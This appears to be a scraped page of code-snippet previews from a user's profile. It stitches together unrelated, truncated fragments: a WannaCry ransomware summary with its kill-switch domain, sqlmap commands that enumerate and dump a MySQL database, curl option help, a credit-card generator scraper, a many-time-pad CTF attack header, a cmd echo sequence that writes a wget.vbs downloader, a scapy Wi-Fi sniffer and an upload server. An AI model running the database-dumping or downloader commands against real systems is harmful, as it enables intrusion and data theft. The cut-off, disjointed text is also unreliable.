Aj Dumanhug ajdumanhug

WannaCry|WannaDecrypt0r NSA-Cyberweapon-Powered Ransomware Worm

Virus Name: WannaCrypt, WannaCry, WanaCrypt0r, WCrypt, WCRY
Vector: All Windows versions before Windows 10 are vulnerable if not patched for MS-17-010. It uses EternalBlue MS17-010 to propagate.
Ransom: between $300 to $600. There is code to 'rm' (delete) files in the virus. Seems to reset if the virus crashes.
Backdooring: The worm loops through every RDP session on a system to run the ransomware as that user. It also installs the DOUBLEPULSAR backdoor. It corrupts shadow volumes to make recovery harder. (source: malwarebytes)
Kill switch: If the website www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com is up the virus exits instead of infecting the host. (source: malwarebytes). This domain has been sinkholed, stopping the spread of the worm. Will not work if proxied (source).

update: A minor variant of the viru

# Enumerate databases
sqlmap --dbms=mysql -u "$URL" --dbs

# Enumerate tables
sqlmap --dbms=mysql -u "$URL" -D "$DATABASE" --tables

# Dump table data
sqlmap --dbms=mysql -u "$URL" -D "$DATABASE" -T "$TABLE" --dump

Common Options

-#, --progress-bar Make curl display a simple progress bar instead of the more informational standard meter.

-b, --cookie <name=data> Supply cookie with request. If no =, then specifies the cookie file to use (see -c).

-c, --cookie-jar <file name> File to save response cookies to.

	#### Credit Card Generator
	#### Made By Random_Robbie
	####
	#### For testing Websites the data here is scraped from a website and the numbers and details are randomly generated no data is real!!
	####
	import requests
	import re

	### Grab Data from http://credit-card-generator.2-ee.com/
	session = requests.Session()

	#!/usr/bin/python
	## OTP - Recovering the private key from a set of messages that were encrypted w/ the same private key (Many time pad attack) - crypto100-many_time_secret @ alexctf 2017
	# @author intrd - http://dann.com.br/
	# Original code by jwomers: https://github.com/Jwomers/many-time-pad-attack/blob/master/attack.py)

	import string
	import collections
	import sets, sys

	# 11 unknown ciphertexts (in hex format), all encrpyted with the same key

	echo strUrl = WScript.Arguments.Item(0) > wget.vbs
	echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
	echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
	echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs
	echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
	echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs
	echo Dim http,varByteArray,strData,strBuffer,lngCounter,fs,ts >> wget.vbs
	echo Err.Clear >> wget.vbs
	echo Set http = Nothing >> wget.vbs
	echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs

	#!/usr/bin/env python

	from scapy.all import *

	ap_list = []

	def PacketHandler(pkt) :

	if pkt.haslayer(Dot11) :
	if pkt.type == 0 and pkt.subtype == 8 :

	#!/usr/bin/env python

	"""Simple HTTP Server With Upload.

	This module builds on BaseHTTPServer by implementing the standard GET
	and HEAD requests in a fairly straightforward manner.

	"""

Aj Dumanhug ajdumanhug

WannaCry|WannaDecrypt0r NSA-Cyberweapon-Powered Ransomware Worm

Common Options

MySQL

Getting started

Related tutorials